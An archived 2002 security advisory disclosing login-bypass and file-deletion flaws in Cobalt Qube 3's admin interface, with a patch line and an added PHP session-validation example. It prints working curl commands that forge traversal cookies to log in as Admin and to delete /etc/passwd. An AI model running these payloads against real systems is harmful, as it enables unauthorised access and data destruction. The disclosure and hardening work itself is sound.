Cobalt Qube 3 Administration page

From: pokley (saleh@scan-associates.net)
Date: Tue Jul 23 2002 - 18:40:01 PDT


    SCAN Associates Sdn Bhd Security Advisory
    
    
    Product: Cobalt Qube 3 (Cobalt Linux release 6.0 (Carmel), Kernel 2.2.16C7 on an i586)
    
    Date: 23rd July 2002
    
    Summary: Login bypass
    
    Author: pokleyzz <pokleyzz@scan-associates.net>, sk <sk@scan-associates.net>,
    shaharil <shaharil@scan-associates.net>
    
    
    Description
    ===========
    First of all, we would like to thank Sun Microsystems (Malaysia) for
    sponsoring a Cobalt Qube 3 server during the recent HackInTheBox Capture the
    Flag Security Conference on 16-17 July 2002. Being the winner, we are proud
    to receive this cool box. After playing around for a while, we found several
    problems in Cobalt Qube 3 System Management. The most serious bug may allow
    remote access as Admin. We alerted security-alertat_private and Sun
    Microsystems (Malaysia) on 19th July but unfortunately we did not receive any
    feedback.
    
    Details
    =======
    
    Problem 1: Local Privilege Escalation to Admin
    
    Any user who can create a file anywhere on a Cobalt server is able to
    promote themselves to Admin in the System Management interface. For example,
    a user may create the file /tmp/test and craft a cookie to log in as Admin
    without a password:
    
    Create dummy session file in Cobalt server:
    
    $ printf "admin" > /tmp/test
    
    Login without password from anywhere:
    
    $ curl -b 'sessionId=/../../../../../../tmp/test;loginName=admin' \
        http://192.168.0.1:444/splashAdmin.php
    
    
    Problem 2: Remote User access
    
    We also found that if the User account is newly created, the authentication
    can be bypassed without creating a dummy session file on the server:
    
    $ curl -b 'sessionId=../codb/objects/4/.name;loginName=admin' \
        http://192.168.0.1:444/splashAdmin.php
    
    
    Problem 3: Remotely delete file
    
    It is possible to delete a file from the server by specifying the path to
    the file together with the first 31 characters of its contents. The
    following example deletes /etc/passwd from the server:
    
    $ curl -b 'sessionId=../../../../../../../../etc/passwd;loginName=root:x:0:0:root:/root:/bin/bash' \
        http://192.168.0.1:444/splashAdmin.php
    
    
    Quick Solution
    ==============
    
    /usr/sausalito/ui/libPhp/ServerScriptHelper.php
    
    line 64:
    $sessionId = ereg_replace("\.\.","",$sessionId);
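
    Stripping ".." only removes one traversal token; any other value containing a path separator still reaches the file system. A stricter check is to accept only an opaque token the server could have issued and to confirm that the resolved path stays under the session directory. The snippet below is an added illustration, not the Cobalt code or Sun's fix; SESSION_DIR, the function names and the assumption that splashAdmin.php turns sessionId into a file name are ours.

```php
<?php
// Added illustration, not Cobalt's or Sun's code. SESSION_DIR and the
// way splashAdmin.php consumes the sessionId cookie are assumptions.
const SESSION_DIR = '/usr/sausalito/ui/sessions'; // assumed location

// Accept only an opaque token the server itself could have issued: no '/',
// '.', '\' or NUL can pass, so "../" sequences and absolute paths are
// rejected before any file name is built from the cookie value.
function isValidSessionId(string $sessionId): bool
{
    return preg_match('/^[A-Za-z0-9]{16,64}$/', $sessionId) === 1;
}

// Build the session file path and confirm it resolves inside SESSION_DIR.
// Returns null for anything that must not be opened or unlinked.
function sessionFilePath(string $sessionId): ?string
{
    if (!isValidSessionId($sessionId)) {
        return null;
    }
    $real = realpath(SESSION_DIR . '/' . $sessionId);
    // realpath() returns false for a missing file, so a forged id that names
    // no real session fails closed; the prefix test is defence in depth
    // behind the regex (symlinks inside SESSION_DIR are resolved too).
    $prefix = SESSION_DIR . '/';
    if ($real === false || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// The three cookie values quoted in this advisory are all refused before
// any file system access happens.
$probes = [
    '/../../../../../../tmp/test',
    '../codb/objects/4/.name',
    '../../../../../../../../etc/passwd',
];
foreach ($probes as $probe) {
    printf("%-40s -> %s\n", $probe, isValidSessionId($probe) ? 'accepted' : 'rejected');
}
```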
    
    
    
    * curl can be downloaded from http://curl.haxx.se/download.html
    
    
    www.scan-associates.net
    



    This archive was generated by hypermail 2b30 : Wed Jul 24 2002 - 11:17:41 PDT